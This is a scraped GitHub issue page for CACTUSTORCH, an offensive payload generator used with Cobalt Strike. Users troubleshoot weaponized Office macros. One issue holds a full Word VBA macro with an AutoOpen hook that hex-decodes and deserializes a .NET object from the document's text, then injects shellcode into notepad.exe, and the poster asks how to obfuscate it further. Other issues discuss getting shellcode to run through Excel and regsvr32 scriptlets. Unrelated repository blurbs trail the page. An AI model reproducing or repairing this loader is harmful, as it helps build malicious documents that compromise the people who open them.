mdsecactivebreach / cactustorch Goto Github PK
View Code? Open in Web Editor NEWCACTUSTORCH: Payload Generation for Adversary Simulations
CACTUSTORCH: Payload Generation for Adversary Simulations
is there a way to add a string reverse function into the split?
Hi Vincent,
Thanks for this awesome project. I'm trying to obfuscate the script a bit by extracting the code
and serialized_obj
variables from the text in the Word document. All the rest of the code is the same as your original code. All the variables seem to populate correctly, however, at Set d = fmt.Deserialize_2(stm)
I'm getting the error:
Apparently it can't deserialize the binary.
I wouldn't normally reach out to you for such issues, but I've been pulling hair out of my head out of frustration. Hope you can identify the issue. Thanks a lot in advance!
Public binary As String
Public code As String
Sub Init()
binary = "notepad.exe"
code = getText("AAAAAA")
End Sub
Private Function getText(id)
Dim res As String
Dim par As String
Dim i As Long
iParCount = ActiveDocument.Paragraphs.Count
For J = 1 To iParCount
par = ActiveDocument.Paragraphs(J).Range.Text
If InStr(par, id) Then
res = par
End If
Next J
getText = res
End Function
Private Function decodeHex(hex)
On Error Resume Next
Dim DM, EL
Set DM = CreateObject("Microsoft.XMLDOM")
Set EL = DM.createElement("tmp")
EL.dataType = "bin.hex"
EL.Text = hex
decodeHex = EL.nodeTypedValue
End Function
Function Run()
Dim entry_class, serialized_obj
entry_class = "cactusTorch"
Dim stm As Object, fmt As Object, al As Object
Set stm = CreateObject("System.IO.MemoryStream")
Set fmt = CreateObject("System.Runtime.Serialization.Formatters.Binary.BinaryFormatter")
Set al = CreateObject("System.Collections.ArrayList")
serialized_obj = getText("00000000000")
' serialized_obj = "0001000000FFFFF..."
MsgBox Len(serialized_obj)
' Len(serialized_obj) = 17957
Dim dec
dec = decodeHex(serialized_obj)
For Each i In dec
stm.WriteByte i
Next i
stm.Position = 0
Dim n As Object, d As Object, o As Object
Set n = fmt.SurrogateSelector
Set d = fmt.Deserialize_2(stm)
al.Add n
Set o = d.DynamicInvoke(al.ToArray()).CreateInstance(entry_class)
o.flame binary, code
End Function
Sub AutoOpen()
Init
Run
End Sub
hello
i'm trying to load the cna script into cobalt strike it's loaded normaly
but when i want to launch it from attacks tab it's not show me the box
of payload generation.
this lines have error please fix them:
[19:57:04] Attempted to call non-existent function &dialog at CACTUSTORCH.cna:736
[19:57:04] Attempted to call non-existent function &dialog_description at CACTUSTORCH.cna:737
[19:57:04] Attempted to call non-existent function &drow_text at CACTUSTORCH.cna:738
[19:57:04] Attempted to call non-existent function &drow_text at CACTUSTORCH.cna:739
[19:57:04] Attempted to call non-existent function &drow_text at CACTUSTORCH.cna:740
[19:57:04] Attempted to call non-existent function &drow_listener_stage at CACTUSTORCH.cna:741
[19:57:04] Attempted to call non-existent function &drow_checkbox at CACTUSTORCH.cna:742
[19:57:04] Attempted to call non-existent function &drow_text at CACTUSTORCH.cna:743
[19:57:04] Attempted to call non-existent function &drow_combobox at CACTUSTORCH.cna:744
[19:57:04] Attempted to call non-existent function &dbutton_action at CACTUSTORCH.cna:745
[19:57:04] Attempted to call non-existent function &dialog_show at CACTUSTORCH.cna:748
Thanks
Regards
Has this method been successful where only a .NET v4 runtime is present? For example from a default Windows 10 install with Excel 2013, the macro fails on:
Set stm = CreateObject("System.IO.MemoryStream")
The minute I add .NET v2, EXCEL calls the version 2 assembly just fine and runs my payload. Does Excel have known issues with calling the newest .NET v4 assembly? I notice the same behavior if I try to use a scriptlet and call:
Declare Function DllInstall Lib "scrobj.dll" (ByVal bInstall As Boolean, ByRef pszCmdLine As Any) As Long
I get an error on:
var enc = new ActiveXObject("System.Text.ASCIIEncoding");
If I call the same scriptlet with regsvr32 on Win10 (with only .NET v4) it runs just fine and my shellcode runs. I even see the .net 4 assembly loaded into regsvr32.exe. If I run the javascript standalone through the windows script host, it works fine. Only problem appears to be with Microsoft Office and the way it doesn't seem to be using the .NET v4 library. Thanks!
A declarative, efficient, and flexible JavaScript library for building user interfaces.
๐ Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. ๐๐๐
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google โค๏ธ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.